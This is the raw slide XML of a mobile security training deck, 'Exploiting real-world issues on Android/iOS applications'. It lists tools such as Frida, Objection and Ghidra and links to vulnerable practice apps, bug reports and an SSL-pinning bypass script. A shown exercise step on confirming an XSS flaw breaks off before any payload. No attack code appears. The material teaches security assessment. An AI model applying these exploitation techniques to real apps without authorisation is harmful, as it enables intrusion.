            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t>Subtitle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Connecteur droit 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8068953" y="877936"/>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8206089" y="877935"/>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0" y="1052736"/>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 name="Connecteur droit 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A434ECD-D6B3-3C60-2A1C-8B7B751AEE5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8068953" y="6464552"/>
            <a:ext cx="137135" cy="174801"/>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3" name="Connecteur droit 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C9136F4-278B-0EEE-C91A-F380A65DEB2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8206089" y="6464551"/>
            <a:ext cx="936399"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5" name="Connecteur droit 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29E9780C-D7C0-7C3A-1AF6-17F8F98CE1AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="0" y="6639352"/>
            <a:ext cx="8068953" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E6A71"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Connecteur droit 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B6D5C52-E735-8223-A882-22E318FF1516}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8068953" y="6464552"/>
            <a:ext cx="137135" cy="1748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11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{676EF1A0-234F-5B4F-6683-6A296250F6C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8206089" y="6464551"/>
            <a:ext cx="936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13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{507B88F0-D5A8-7ED5-DA2B-E01B9B70CF76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="0" y="6639352"/>
            <a:ext cx="80689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ZoneTexte 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF77ED3-BA2F-4317-C421-095EC6420F09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1858651" y="6595219"/>
            <a:ext cx="5299531" cy="29924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i="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Mobile Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="800" kern="1200">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="ZoneTexte 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9D9ADE1-FC9C-B912-FEDB-F046F3EABF20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7763069" y="6350363"/>
            <a:ext cx="870713" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1200" err="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CD0BB82-CF06-C3F4-0F92-9B7B678682B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="46531" y="6287643"/>
            <a:ext cx="548542" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1200" err="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 2" descr="sec4dev (@sec4dev) / Twitter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{438D83AD-8240-8172-F600-F5E5532200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782" y="650465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A5E0CF5-2FE1-340D-D523-BEA03720EBBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="6654801"/>
            <a:ext cx="761568" cy="203181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1084B8A9-79C5-48BD-98E7-F53406A930D7}" type="slidenum">
              <a:rPr lang="en-GB" sz="900" noProof="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A6AFB4"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" sz="900" noProof="0">
              <a:solidFill>
                <a:srgbClr val="A6AFB4"/>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2"/>
            </p:custDataLst>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1619660780"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1513" y="1589"/>
          <a:ext cx="1511" cy="1587"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj name="think-cell Slide" r:id="rId13" imgW="360" imgH="360" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId13" imgW="360" imgH="360" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="5" name="Object 4"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3" y="1589"/>
                        <a:ext cx="1511"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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418730" y="1447801"/>
            <a:ext cx="8503057" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="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GB" noProof="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04" r:id="rId7"/>
    <p:sldLayoutId id="2147483667" r:id="rId8"/>
    <p:sldLayoutId id="2147483668" r:id="rId9"/>
    <p:sldLayoutId id="2147483681" r:id="rId10"/>
  </p:sldLayoutIdLst>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177800" indent="-177800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent3"/>
        </a:buClr>
        <a:buSzPct val="150000"/>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="355600" indent="-177800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buSzPct val="100000"/>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="541338" indent="-185738" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buSzPct val="100000"/>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="719138" indent="-177800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buSzPct val="100000"/>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="896938" indent="-177800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>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mobexler.com/download.htm"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hyperlink" Target="https://www.randorisec.fr/setting-up-mobexler-vmware-androidstudio/"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127.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tmmmmmr.github.io/xss_1.html"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heatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html" TargetMode="Externa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s.google.com/safe-browsing/v4"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8.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/training/safetynet/safebrowsing" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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allysonomalley.com/2018/12/03/ios-bug-hunting-web-view-xss/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/33828064/ios-web-view-javascript-disable?1q=1"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hyperlink" Target="https://stackoverflow.com/questions/48835813/can-i-disable-js-in-a-uiwebview-objective-c" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/documentation/webkit/wkwebview" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/documentation/uikit/uiwebview"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52.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://team-sik.org/sik-2016-022/" TargetMode="External"/><Relationship Id="rId7"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apkpure.com/forticlient-vpn/com.fortinet.forticlient_vpn/download/502080127-APK" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/CVE-2015-1453/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.apkhere.com/down/com.lastpass.lpandroid_4.0.52_free"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FSecureLABS/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js"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OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md"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hyperlink" Target="https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md#identifying-insecure-and/or-deprecated-cryptographic-algorithms"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NULL" TargetMode="Externa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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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48.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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1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ource.android.com/devices/tech/dalvik" TargetMode="External"/><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9.xml"/><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4.xml"/><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hyperlink" Target="https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/" TargetMode="External"/><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2.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1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hyperlink" Target="https://www.nowsecure.com/blog/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://7asecurity.com/publications" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.oversecured.com/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/B3nac/Android-Reports-and-Resources" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/oversecured/ovaa" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/B3nac/InjuredAndroid/"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ida.r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hackerone.com/reports/412772" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/246995" TargetMode="Externa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hyperlink" Target="https://hackerone.com/reports/351555"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android.com/studio/command-line/logcat" TargetMode="External"/><Relationship Id="rId7"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hyperlink" Target="https://hackerone.com/reports/53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JakeWharton/pidcat"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hyperlink" Target="https://gist.github.com/pich4ya/0b2a8592d3c8d5df9c34b8d185d2ea35"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www.corellium.com/compare/ios-simulator"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mmmmmR/mobile-training/blob/master/android/Periscope%20Live%20Video_v1.25.5.93_apkpure.com.apk"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mmmmmR/mobile-training/raw/master/android/DeepLinkTester.apk"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developer.android.com/training/app-links/deep-linking" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.jp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hyperlink" Target="https://hackerone.com/reports/583987" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/401793"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8.jpg"/></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TmmmmmR/mobile-training/raw/master/ios/dvia.ipa"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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tmmmmmr.github.io/url_handler_dvia-v2.html"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hyperlink" Target="https://tmmmmmr.github.io/url_handler_dvia-v2.html"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hyperlink" Target="http://software-security.sans.org/blog/2010/11/08/insecure-handling-url-schemes-apples-ios/"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TmmmmmR/mobile-training/raw/master/android/AndroGoat_Improved.apk" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/satishpatnayak/AndroGoat"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76C771-D3F2-E045-D21A-DB0D90CE29C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>Bootcamp D :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Exploiting real-world issues on Android/iOS applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D22207B9-A070-468D-61F0-C73DE3085FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-FR"/>
              <a:t>07/09/2022</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F856C24-D3CD-CF80-41A4-404C71A18FBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-FR"/>
              <a:t>By : Abdessamad TEMMAR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C96BDFEF-82FA-E123-F5B0-7C878758C645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8430567" y="6571622"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-FR" sz="1200" err="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3707649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Introduce common tools to assess mobile apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>apktool</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Jadx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Objection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Frida</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Ghidra</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Present different techniques to analyze an Android app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Perform practical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>exercices</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="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dirty="0" err="1"/>
              <a:t>Mobexler</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4"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3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Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Confirming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> the XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>There are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>two</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> inputs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>available</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: one for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>internal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>external</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
